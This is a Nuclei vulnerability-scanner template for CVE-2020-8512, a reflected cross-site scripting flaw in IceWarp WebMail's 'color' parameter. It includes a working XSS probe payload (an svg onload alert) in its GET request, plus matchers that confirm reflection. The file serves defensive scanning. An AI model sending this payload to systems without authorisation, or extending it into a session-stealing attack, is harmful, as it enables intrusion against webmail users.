nuclei-templates/cves/2020/CVE-2020-8512.yaml

34 lines
906 B
YAML

id: CVE-2020-8512
info:
name: IceWarp WebMail XSS
author: pdteam,dwisiswant0
severity: medium
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
reference:
- https://www.exploit-db.com/exploits/47988
- https://twitter.com/sagaryadav8742/status/1275170967527006208
tags: cve,cve2020,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-8512
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(document.domain)>"
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header